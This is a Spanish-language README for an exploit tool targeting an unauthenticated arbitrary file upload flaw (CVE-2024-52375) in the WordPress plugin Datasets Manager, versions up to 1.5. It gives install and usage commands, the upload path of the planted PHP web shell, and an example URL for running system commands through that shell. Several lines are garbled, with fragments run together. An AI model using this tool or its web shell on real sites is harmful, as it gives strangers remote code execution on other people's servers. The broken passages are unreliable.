
WordPress Datasets Manager de Arttia Creative plugin <= 1.5 - Vulnerabilidad de Carga Arbitraria de Archivos
💥 Exploit por: Nxploit (Khaled Alenazi)
📅 CVE Publicado: 14 de noviembre de 2024
🧠 Puntuación CVSS: 10.0 (Crítico)
🛠 CWE-434: Subida sin restricciones de archivos con tipo peligroso
Se descubrió una vulnerabilidad crítica en el plugin de WordPress Datasets Manager by Arttia Creative, que afecta a todas las versiones hasta la 1.5 inclusive.
El plugin no valida correctamente los tipos de archivo durante el proceso de subida, lo que permite a un atacante no autenticado subir archivos arbitrarios — incluyendo shells PHP — y lograr Ejecución Remota de Código (RCE).
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
Reemplace la URL con la ruta completa a la instalación de WordPress objetivo.
Si tiene éxito, el script:
_wpnonce público del frontend.nxploit.php.[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
Luego puede ejecutar comandos como:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt.<= 1.5 son vulnerables.Esta herramienta se proporciona solo con fines educativos y de pruebas autorizadas.
Usarla contra sistemas que no posee o para los que no tiene permiso de pruebas es ilegal.